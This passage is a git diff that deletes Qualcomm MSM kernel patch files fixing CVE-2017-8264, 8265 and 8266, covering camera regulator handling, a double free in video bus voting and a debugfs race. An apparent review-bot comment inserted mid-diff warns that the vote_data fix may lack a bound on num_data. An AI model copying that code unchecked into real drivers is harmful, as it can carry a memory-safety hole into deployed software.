-@@ -205,6 +209,21 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- }
- CDBG("%s:%d called\n", __func__, __LINE__);
-
-+ rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 1);
-+ if (rc < 0) {
-+ pr_err("%s: regulator config failed\n", __func__);
-+ goto csiphy_vreg_config_fail;
-+ }
-+ rc = msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 1);
-+ if (rc < 0) {
-+ pr_err("%s: regulator enable failed\n", __func__);
-+ goto csiphy_vreg_enable_fail;
-+ }
-+
- if (CSIPHY_VERSION == CSIPHY_VERSION_V22) {
- rc = msm_cam_clk_enable(&csiphy_dev->pdev->dev,
- csiphy_8610_clk_info, csiphy_dev->csiphy_clk,
-@@ -268,6 +287,16 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- csiphy_dev->hw_version);
- csiphy_dev->csiphy_state = CSIPHY_POWER_UP;
- return 0;
-+
-+csiphy_vreg_enable_fail:
-+ rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 0);
-+csiphy_vreg_config_fail:
-+ iounmap(csiphy_dev->base);
-+ csiphy_dev->base = NULL;
-+ return rc;
-+
- }
- #else
- static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
-@@ -303,6 +332,22 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- rc = -ENOMEM;
- return rc;
- }
-+
-+ rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 1);
-+ if (rc < 0) {
-+ pr_err("%s: regulator config failed\n", __func__);
-+ goto csiphy_vreg_config_fail;
-+ }
-+ rc = msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 1);
-+ if (rc < 0) {
-+ pr_err("%s: regulator enable failed\n", __func__);
-+ goto csiphy_vreg_enable_fail;
-+ }
-+
- if (CSIPHY_VERSION == CSIPHY_VERSION_V22) {
- rc = msm_cam_clk_enable(&csiphy_dev->pdev->dev,
- csiphy_8610_clk_info, csiphy_dev->csiphy_clk,
-@@ -364,6 +409,15 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- csiphy_dev->hw_version);
- csiphy_dev->csiphy_state = CSIPHY_POWER_UP;
- return 0;
-+
-+csiphy_vreg_enable_fail:
-+ rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 0);
-+csiphy_vreg_config_fail:
-+ iounmap(csiphy_dev->base);
-+ csiphy_dev->base = NULL;
-+ return rc;
- }
- #endif
-
-@@ -445,6 +499,19 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- ARRAY_SIZE(csiphy_clk_info), 0);
- iounmap(csiphy_dev->clk_mux_base);
- }
-+
-+ msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 0);
-+ msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 0);
-+
-+ if (!IS_ERR_OR_NULL(csiphy_dev->reg_ptr)) {
-+ regulator_disable(csiphy_dev->reg_ptr);
-+ regulator_put(csiphy_dev->reg_ptr);
-+ }
-+
- iounmap(csiphy_dev->base);
- csiphy_dev->base = NULL;
- csiphy_dev->csiphy_state = CSIPHY_POWER_DOWN;
-@@ -527,6 +594,18 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- iounmap(csiphy_dev->clk_mux_base);
- }
-
-+ msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 0);
-+ msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_vreg_info, ARRAY_SIZE(csiphy_vreg_info),
-+ NULL, 0, &csiphy_dev->csi_vdd, 0);
-+
-+ if (!IS_ERR_OR_NULL(csiphy_dev->reg_ptr)) {
-+ regulator_disable(csiphy_dev->reg_ptr);
-+ regulator_put(csiphy_dev->reg_ptr);
-+ }
-+
- iounmap(csiphy_dev->base);
- csiphy_dev->base = NULL;
- csiphy_dev->csiphy_state = CSIPHY_POWER_DOWN;
-@@ -630,6 +709,7 @@ static const struct v4l2_subdev_ops msm_csiphy_subdev_ops = {
- static int csiphy_probe(struct platform_device *pdev)
- {
- struct csiphy_device *new_csiphy_dev;
-+ uint32_t csi_vdd_voltage = 0;
- int rc = 0;
-
- new_csiphy_dev = kzalloc(sizeof(struct csiphy_device), GFP_KERNEL);
-@@ -649,6 +729,19 @@ static int csiphy_probe(struct platform_device *pdev)
- "cell-index", &pdev->id);
- CDBG("%s: device id = %d\n", __func__, pdev->id);
-
-+ rc = of_property_read_u32((&pdev->dev)->of_node,
-+ "qcom,csi-vdd-voltage", &csi_vdd_voltage);
-+ if (rc < 0) {
-+ pr_err("%s:%d failed to read qcom,csi-vdd-voltage\n",
-+ __func__, __LINE__);
-+ return rc;
-+ }
-+ CDBG("%s:%d reading mipi_csi_vdd is %d\n", __func__, __LINE__,
-+ csi_vdd_voltage);
-+
-+ csiphy_vreg_info[0].min_voltage = csi_vdd_voltage;
-+ csiphy_vreg_info[0].max_voltage = csi_vdd_voltage;
-+
- new_csiphy_dev->mem = platform_get_resource_byname(pdev,
- IORESOURCE_MEM, "csiphy");
- if (!new_csiphy_dev->mem) {
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-index ff97ab7..3c843a2 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-@@ -47,6 +47,8 @@ struct csiphy_device {
-
- int32_t ref_count;
- uint16_t lane_mask[MAX_CSIPHY];
-+ struct regulator *csi_vdd;
-+ struct regulator *reg_ptr;
- };
-
- #define VIDIOC_MSM_CSIPHY_RELEASE \
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8264/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8264/3.18/0002.patch
deleted file mode 100644
index 0fda518e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8264/3.18/0002.patch
+++ /dev/null
@@ -1,316 +0,0 @@
-From 53c6b89349730765a71722d274fc3fa41287d21f Mon Sep 17 00:00:00 2001
-From: Ravi Kishore Tanuku
-Date: Wed, 22 Feb 2017 20:00:13 +0530
-Subject: msm: camera: Add regulator enable and disable independent of CSID
-
-Regulator enable and disable of CSIPHY depends on the CSID module.
-Make the enable and disable of clk regulator independent of CSIPHY.
-
-CRs-Fixed: 1107702
-Change-Id: Iabb5eb28d63b34a4c3201c53be17054a1907f4fe
-Signed-off-by: Ravi Kishore Tanuku
----
- arch/arm/boot/dts/qcom/msm8996-camera.dtsi | 38 ++++++---
- .../msm/camera_v2/sensor/csiphy/msm_csiphy.c | 94 ++++++++++++++++++++--
- .../msm/camera_v2/sensor/csiphy/msm_csiphy.h | 6 +-
- 3 files changed, 120 insertions(+), 18 deletions(-)
-
-diff --git a/arch/arm/boot/dts/qcom/msm8996-camera.dtsi b/arch/arm/boot/dts/qcom/msm8996-camera.dtsi
-index 3e1a889..e4960d0 100644
---- a/arch/arm/boot/dts/qcom/msm8996-camera.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8996-camera.dtsi
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -28,18 +28,24 @@
- reg-names = "csiphy", "csiphy_clk_mux";
- interrupts = <0 78 0>;
- interrupt-names = "csiphy";
-- clocks = <&clock_mmss clk_camss_top_ahb_clk>,
-+ qcom,csi-vdd-voltage = <1250000>;
-+ qcom,mipi-csi-vdd-supply = <&pm8994_l2>;
-+ mmagic-supply = <&gdsc_mmagic_camss>;
-+ gdscr-supply = <&gdsc_camss_top>;
-+ qcom,cam-vreg-name = "mmagic", "gdscr";
-+ clocks = <&clock_mmss clk_mmss_mmagic_ahb_clk>,
-+ <&clock_mmss clk_camss_top_ahb_clk>,
- <&clock_mmss clk_camss_ispif_ahb_clk>,
- <&clock_mmss clk_csi0phytimer_clk_src>,
- <&clock_mmss clk_camss_csi0phytimer_clk>,
- <&clock_mmss clk_camss_ahb_clk>,
- <&clock_mmss clk_csiphy0_3p_clk_src>,
- <&clock_mmss clk_camss_csiphy0_3p_clk>;
-- clock-names = "camss_top_ahb_clk",
-+ clock-names = "mmagic_ahb_clk", "camss_top_ahb_clk",
- "ispif_ahb_clk", "csiphy_timer_src_clk",
- "csiphy_timer_clk", "camss_ahb_clk",
- "csiphy_3p_clk_src", "csi_phy_3p_clk";
-- qcom,clock-rates = <0 0 200000000 0 0 100000000 0>;
-+ qcom,clock-rates = <0 0 0 200000000 0 0 100000000 0>;
- };
-
- qcom,csiphy@a35000 {
-@@ -49,18 +55,24 @@
- reg-names = "csiphy", "csiphy_clk_mux";
- interrupts = <0 79 0>;
- interrupt-names = "csiphy";
-- clocks = <&clock_mmss clk_camss_top_ahb_clk>,
-+ qcom,csi-vdd-voltage = <1250000>;
-+ qcom,mipi-csi-vdd-supply = <&pm8994_l2>;
-+ mmagic-supply = <&gdsc_mmagic_camss>;
-+ gdscr-supply = <&gdsc_camss_top>;
-+ qcom,cam-vreg-name = "mmagic", "gdscr";
-+ clocks = <&clock_mmss clk_mmss_mmagic_ahb_clk>,
-+ <&clock_mmss clk_camss_top_ahb_clk>,
- <&clock_mmss clk_camss_ispif_ahb_clk>,
- <&clock_mmss clk_csi1phytimer_clk_src>,
- <&clock_mmss clk_camss_csi1phytimer_clk>,
- <&clock_mmss clk_camss_ahb_clk>,
- <&clock_mmss clk_csiphy1_3p_clk_src>,
- <&clock_mmss clk_camss_csiphy1_3p_clk>;
-- clock-names = "camss_top_ahb_clk",
-+ clock-names = "mmagic_ahb_clk", "camss_top_ahb_clk",
- "ispif_ahb_clk", "csiphy_timer_src_clk",
- "csiphy_timer_clk", "camss_ahb_clk",
- "csiphy_3p_clk_src", "csi_phy_3p_clk";
-- qcom,clock-rates = <0 0 200000000 0 0 100000000 0>;
-+ qcom,clock-rates = <0 0 0 200000000 0 0 100000000 0>;
- };
-
- qcom,csiphy@a36000 {
-@@ -70,18 +82,24 @@
- reg-names = "csiphy", "csiphy_clk_mux";
- interrupts = <0 80 0>;
- interrupt-names = "csiphy";
-- clocks = <&clock_mmss clk_camss_top_ahb_clk>,
-+ qcom,csi-vdd-voltage = <1250000>;
-+ qcom,mipi-csi-vdd-supply = <&pm8994_l2>;
-+ mmagic-supply = <&gdsc_mmagic_camss>;
-+ gdscr-supply = <&gdsc_camss_top>;
-+ qcom,cam-vreg-name = "mmagic", "gdscr";
-+ clocks = <&clock_mmss clk_mmss_mmagic_ahb_clk>,
-+ <&clock_mmss clk_camss_top_ahb_clk>,
- <&clock_mmss clk_camss_ispif_ahb_clk>,
- <&clock_mmss clk_csi2phytimer_clk_src>,
- <&clock_mmss clk_camss_csi2phytimer_clk>,
- <&clock_mmss clk_camss_ahb_clk>,
- <&clock_mmss clk_csiphy2_3p_clk_src>,
- <&clock_mmss clk_camss_csiphy2_3p_clk>;
-- clock-names = "camss_top_ahb_clk",
-+ clock-names = "mmagic_ahb_clk", "camss_top_ahb_clk",
- "ispif_ahb_clk", "csiphy_timer_src_clk",
- "csiphy_timer_clk", "camss_ahb_clk",
- "csiphy_3p_clk_src", "csi_phy_3p_clk";
-- qcom,clock-rates = <0 0 200000000 0 0 100000000 0>;
-+ qcom,clock-rates = <0 0 0 200000000 0 0 100000000 0>;
- };
-
- qcom,csid@a30000 {
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-index 9d6952ee..d1bb9af 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -782,6 +782,25 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
-
- CDBG("%s:%d called\n", __func__, __LINE__);
-
-+ rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg,
-+ csiphy_dev->regulator_count, NULL, 0,
-+ &csiphy_dev->csiphy_reg_ptr[0], 1);
-+ if (rc < 0) {
-+ pr_err("%s:%d csiphy config_vreg failed\n",
-+ __func__, __LINE__);
-+ goto csiphy_vreg_config_fail;
-+ }
-+ rc = msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg,
-+ csiphy_dev->regulator_count, NULL, 0,
-+ &csiphy_dev->csiphy_reg_ptr[0], 1);
-+ if (rc < 0) {
-+ pr_err("%s:%d csiphy enable_vreg failed\n",
-+ __func__, __LINE__);
-+ goto top_vreg_enable_failed;
-+ }
-+
- rc = msm_camera_clk_enable(&csiphy_dev->pdev->dev,
- csiphy_dev->csiphy_clk_info, csiphy_dev->csiphy_clk,
- csiphy_dev->num_clk, true);
-@@ -790,7 +809,7 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- if (rc < 0) {
- pr_err("%s: csiphy clk enable failed\n", __func__);
- csiphy_dev->ref_count--;
-- goto csiphy_resource_fail;
-+ goto csiphy_enable_clk_fail;
- }
- CDBG("%s:%d called\n", __func__, __LINE__);
-
-@@ -818,7 +837,17 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- csiphy_dev->csiphy_state = CSIPHY_POWER_UP;
- return 0;
-
--csiphy_resource_fail:
-+csiphy_enable_clk_fail:
-+ msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg,
-+ csiphy_dev->regulator_count, NULL, 0,
-+ &csiphy_dev->csiphy_reg_ptr[0], 0);
-+top_vreg_enable_failed:
-+ msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg,
-+ csiphy_dev->regulator_count, NULL, 0,
-+ &csiphy_dev->csiphy_reg_ptr[0], 0);
-+csiphy_vreg_config_fail:
- if (cam_config_ahb_clk(NULL, 0, CAM_AHB_CLIENT_CSIPHY,
- CAM_AHB_SUSPEND_VOTE) < 0)
- pr_err("%s: failed to vote for AHB\n", __func__);
-@@ -856,6 +885,24 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- pr_err("%s: failed to vote for AHB\n", __func__);
- return rc;
- }
-+ rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg,
-+ csiphy_dev->regulator_count, NULL, 0,
-+ &csiphy_dev->csiphy_reg_ptr[0], 1);
-+ if (rc < 0) {
-+ pr_err("%s:%d csiphy config_vreg failed\n",
-+ __func__, __LINE__);
-+ goto csiphy_vreg_config_fail;
-+ }
-+ rc = msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg,
-+ csiphy_dev->regulator_count, NULL, 0,
-+ &csiphy_dev->csiphy_reg_ptr[0], 1);
-+ if (rc < 0) {
-+ pr_err("%s:%d csiphy enable_vreg failed\n",
-+ __func__, __LINE__);
-+ goto top_vreg_enable_failed;
-+ }
-
- rc = msm_camera_clk_enable(&csiphy_dev->pdev->dev,
- csiphy_dev->csiphy_clk_info, csiphy_dev->csiphy_clk,
-@@ -865,9 +912,9 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- if (rc < 0) {
- pr_err("%s: csiphy clk enable failed\n", __func__);
- csiphy_dev->ref_count--;
-- goto csiphy_resource_fail;
-+ goto csiphy_enable_clk_fail;
- }
-- CDBG("%s:%d called\n", __func__, __LINE__);
-+ CDBG("%s:%d clk enable success\n", __func__, __LINE__);
-
- if (csiphy_dev->csiphy_3phase == CSI_3PHASE_HW)
- msm_csiphy_3ph_reset(csiphy_dev);
-@@ -890,7 +937,17 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- csiphy_dev->csiphy_state = CSIPHY_POWER_UP;
- return 0;
-
--csiphy_resource_fail:
-+csiphy_enable_clk_fail:
-+ msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg,
-+ csiphy_dev->regulator_count, NULL, 0,
-+ &csiphy_dev->csiphy_reg_ptr[0], 0);
-+top_vreg_enable_failed:
-+ msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg,
-+ csiphy_dev->regulator_count, NULL, 0,
-+ &csiphy_dev->csiphy_reg_ptr[0], 0);
-+csiphy_vreg_config_fail:
- if (cam_config_ahb_clk(NULL, 0, CAM_AHB_CLIENT_CSIPHY,
- CAM_AHB_SUSPEND_VOTE) < 0)
- pr_err("%s: failed to vote for AHB\n", __func__);
-@@ -998,6 +1055,14 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- csiphy_dev->csiphy_3p_clk, 2, false);
- }
-
-+ msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg,
-+ csiphy_dev->regulator_count, NULL, 0,
-+ &csiphy_dev->csiphy_reg_ptr[0], 0);
-+ msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg, csiphy_dev->regulator_count,
-+ NULL, 0, &csiphy_dev->csiphy_reg_ptr[0], 0);
-+
- csiphy_dev->csiphy_state = CSIPHY_POWER_DOWN;
-
- if (cam_config_ahb_clk(NULL, 0, CAM_AHB_CLIENT_CSIPHY,
-@@ -1104,6 +1169,13 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- csiphy_dev->csiphy_3p_clk, 2, false);
- }
-
-+ msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg, csiphy_dev->regulator_count,
-+ NULL, 0, &csiphy_dev->csiphy_reg_ptr[0], 0);
-+ msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+ csiphy_dev->csiphy_vreg, csiphy_dev->regulator_count,
-+ NULL, 0, &csiphy_dev->csiphy_reg_ptr[0], 0);
-+
- csiphy_dev->csiphy_state = CSIPHY_POWER_DOWN;
-
- if (cam_config_ahb_clk(NULL, 0, CAM_AHB_CLIENT_CSIPHY,
-@@ -1419,6 +1491,14 @@ static int csiphy_probe(struct platform_device *pdev)
- goto csiphy_no_resource;
- }
-
-+ rc = msm_camera_get_dt_vreg_data(pdev->dev.of_node,
-+ &(new_csiphy_dev->csiphy_vreg),
-+ &(new_csiphy_dev->regulator_count));
-+ if (rc < 0) {
-+ pr_err("%s: get vreg data from dtsi fail\n", __func__);
-+ rc = -EFAULT;
-+ goto csiphy_no_resource;
-+ }
- /* ToDo: Enable 3phase clock for dynamic clock enable/disable */
- rc = msm_csiphy_get_clk_info(new_csiphy_dev, pdev);
- if (rc < 0) {
-@@ -1493,7 +1573,7 @@ static int msm_csiphy_exit(struct platform_device *pdev)
- &csiphy_dev->csiphy_all_clk,
- csiphy_dev->num_all_clk);
-
-- msm_camera_put_reg_base(pdev, csiphy_dev->base, "csid", true);
-+ msm_camera_put_reg_base(pdev, csiphy_dev->base, "csiphy", true);
- if (csiphy_dev->hw_dts_version >= CSIPHY_VERSION_V30) {
- msm_camera_put_reg_base(pdev, csiphy_dev->clk_mux_base,
- "csiphy_clk_mux", true);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-index 4b3c407..07a0811 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -20,6 +20,7 @@
- #include
- #include "msm_sd.h"
- #include "msm_camera_io_util.h"
-+#include "msm_camera_dt_util.h"
- #include "cam_soc_api.h"
-
- #define MAX_CSIPHY 3
-@@ -168,6 +169,9 @@ struct csiphy_device {
- uint8_t num_irq_registers;
- uint32_t csiphy_sof_debug;
- uint32_t csiphy_sof_debug_count;
-+ struct camera_vreg_t *csiphy_vreg;
-+ struct regulator *csiphy_reg_ptr[MAX_REGULATOR];
-+ int32_t regulator_count;
- };
-
- #define VIDIOC_MSM_CSIPHY_RELEASE \
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8265/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8265/ANY/0001.patch
deleted file mode 100644
index ac55f011..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8265/ANY/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@ -From 193813a21453ccc7fb6b04bedf881a6feaaa015f Mon Sep 17 00:00:00 2001 -From: Vasantha Balla -Date: Tue, 28 Mar 2017 16:04:06 +0530 -Subject: msm-vidc: Allocate bus vote data during initialization - -Dynamic reallocation of vote_data memory can cause double free -problem if multiple instances try to reallocate simultaneously. -So allocate this memory statically. - -Change-Id: Ib5ff08c600a4b69a38b519688bbc153de9f50090 -Signed-off-by: Vasantha Balla ---- - drivers/media/platform/msm/vidc/venus_hfi.c | 25 ++++++++++++++----------- - 1 file changed, 14 insertions(+), 11 deletions(-) - -diff --git a/drivers/media/platform/msm/vidc/venus_hfi.c b/drivers/media/platform/msm/vidc/venus_hfi.c -index 4df4f35..8b98c41d 100644 ---- a/drivers/media/platform/msm/vidc/venus_hfi.c -+++ b/drivers/media/platform/msm/vidc/venus_hfi.c -@@ -929,15 +929,12 @@ static int venus_hfi_vote_active_buses(void *dev, - return -EINVAL; - } - -- /* (Re-)alloc memory to store the new votes (in case we internally -- * re-vote after power collapse, which is transparent to client) */ -- cached_vote_data = krealloc(device->bus_load.vote_data, num_data * -- sizeof(*cached_vote_data), GFP_KERNEL); -- if (!cached_vote_data) { -- dprintk(VIDC_ERR, "Can't alloc memory to cache bus votes\n"); -- rc = -ENOMEM; -- goto err_no_mem; -- } -+ cached_vote_data = device->bus_load.vote_data; -+ if (!cached_vote_data) { -+ dprintk(VIDC_ERR,"Invalid bus load vote data\n"); -+ rc = -ENOMEM; -+ goto err_no_mem; -+ } - - /* Alloc & init the load table */ - num_bus = device->res->bus_set.count; -@@ -3746,9 +3743,15 @@ static int venus_hfi_init_bus(struct venus_hfi_device *device) - dprintk(VIDC_DBG, "Registered bus client %s\n", name); - } - -- device->bus_load.vote_data = NULL; -- device->bus_load.vote_data_count = 0; -+ device->bus_load.vote_data = (struct vidc_bus_vote_data *) -+ kzalloc(sizeof(struct vidc_bus_vote_data)*MAX_SUPPORTED_INSTANCES_COUNT, GFP_KERNEL); - -+ if (device->bus_load.vote_data == 
NULL) { -+ dprintk(VIDC_ERR,"Failed to allocate memory for vote_data\n"); -+ rc = -ENOMEM; -+ goto err_init_bus; -+ } -+ device->bus_load.vote_data_count = 0; - return rc; - err_init_bus: - venus_hfi_deinit_bus(device); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8266/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8266/3.10/0001.patch deleted file mode 100644 index c620412f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8266/3.10/0001.patch +++ /dev/null 
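Review bot: With `vote_data` now a fixed array of MAX_SUPPORTED_INSTANCES_COUNT entries, venus_hfi_vote_active_buses needs an upper bound on `num_data` before it fills `cached_vote_data`. The removed krealloc sized the buffer to `num_data`, and no such bound is visible in this hunk; the function continues outside it, so the check may already exist there. If it does not, `if (num_data > MAX_SUPPORTED_INSTANCES_COUNT) return -EINVAL;` next to the existing argument checks would keep the copy inside the array. In venus_hfi_init_bus the allocation reads better as `kcalloc(MAX_SUPPORTED_INSTANCES_COUNT, sizeof(*device->bus_load.vote_data), GFP_KERNEL)` with no cast. A missing buffer in the vote path is an invalid state rather than an allocation failure, so `-EINVAL` fits better than `-ENOMEM` there.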
@@ -1,182 +0,0 @@ -From aa23820b001ab1cfb86b79014e9fc44cd2be9ece Mon Sep 17 00:00:00 2001 -From: Ingrid Gallardo -Date: Wed, 1 Mar 2017 12:24:06 -0800 -Subject: msm: mdss: fix race condition in mdp debugfs - -Fix race condition in mdp debugfs properties -during the read and write of the panel and -mdp registers. This race condition can cause -accessing memory out bounderies. - -Change-Id: I97a90a154237343d4aaf237c11f525bcc2c3a8e3 -Signed-off-by: Ingrid Gallardo -Signed-off-by: Nirmal Abraham ---- - drivers/video/msm/mdss/mdss_debug.c | 48 ++++++++++++++++++++++++++++++------- - 1 file changed, 40 insertions(+), 8 deletions(-) - -diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c -index a95fa43..cedd40cd 100644 ---- a/drivers/video/msm/mdss/mdss_debug.c -+++ b/drivers/video/msm/mdss/mdss_debug.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2009-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2009-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -39,6 +39,8 @@ - #define PANEL_CMD_MIN_TX_COUNT 2 - #define PANEL_DATA_NODE_LEN 80 - -+static DEFINE_MUTEX(mdss_debug_lock); -+ - static char panel_reg[2] = {DEFAULT_READ_PANEL_POWER_MODE_REG, 0x00}; - - static int panel_debug_base_open(struct inode *inode, struct file *file) -@@ -88,8 +90,10 @@ static ssize_t panel_debug_base_offset_write(struct file *file, - if (cnt > (dbg->max_offset - off)) - cnt = dbg->max_offset - off; - -+ mutex_lock(&mdss_debug_lock); - dbg->off = off; - dbg->cnt = cnt; -+ mutex_unlock(&mdss_debug_lock); - - pr_debug("offset=%x cnt=%d\n", off, cnt); - -@@ -109,15 +113,21 @@ static ssize_t panel_debug_base_offset_read(struct file *file, - if (*ppos) - return 0; /* the end */ - -+ mutex_lock(&mdss_debug_lock); - len = snprintf(buf, sizeof(buf), "0x%02zx %zx\n", dbg->off, dbg->cnt); -- if (len < 0 || len >= sizeof(buf)) -+ if (len < 0 || len >= sizeof(buf)) { -+ mutex_unlock(&mdss_debug_lock); - return 0; -+ } - -- if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) -+ if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) { -+ mutex_unlock(&mdss_debug_lock); - return -EFAULT; -+ } - - *ppos += len; /* increase offset */ - -+ mutex_unlock(&mdss_debug_lock); - return len; - } - -@@ -206,11 +216,16 @@ static ssize_t panel_debug_base_reg_read(struct file *file, - if (!dbg) - return -ENODEV; - -- if (!dbg->cnt) -+ mutex_lock(&mdss_debug_lock); -+ if (!dbg->cnt) { -+ mutex_unlock(&mdss_debug_lock); - return 0; -+ } - -- if (*ppos) -+ if (*ppos) { -+ mutex_unlock(&mdss_debug_lock); - return 0; /* the end */ -+ } - - /* '0x' + 2 digit + blank = 5 bytes for each number */ - reg_buf_len = (dbg->cnt * PANEL_REG_FORMAT_LEN) -@@ -251,11 +266,13 @@ static ssize_t panel_debug_base_reg_read(struct file *file, - kfree(panel_reg_buf); - - *ppos += len; /* increase offset */ -+ 
mutex_unlock(&mdss_debug_lock); - return len; - - read_reg_fail: - kfree(rx_buf); - kfree(panel_reg_buf); -+ mutex_unlock(&mdss_debug_lock); - return rc; - } - -@@ -386,8 +403,10 @@ static ssize_t mdss_debug_base_offset_write(struct file *file, - if (cnt > (dbg->max_offset - off)) - cnt = dbg->max_offset - off; - -+ mutex_lock(&mdss_debug_lock); - dbg->off = off; - dbg->cnt = cnt; -+ mutex_unlock(&mdss_debug_lock); - - pr_debug("offset=%x cnt=%x\n", off, cnt); - -@@ -407,15 +426,21 @@ static ssize_t mdss_debug_base_offset_read(struct file *file, - if (*ppos) - return 0; /* the end */ - -+ mutex_lock(&mdss_debug_lock); - len = snprintf(buf, sizeof(buf), "0x%08zx %zx\n", dbg->off, dbg->cnt); -- if (len < 0 || len >= sizeof(buf)) -+ if (len < 0 || len >= sizeof(buf)) { -+ mutex_unlock(&mdss_debug_lock); - return 0; -+ } - -- if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) -+ if ((count < 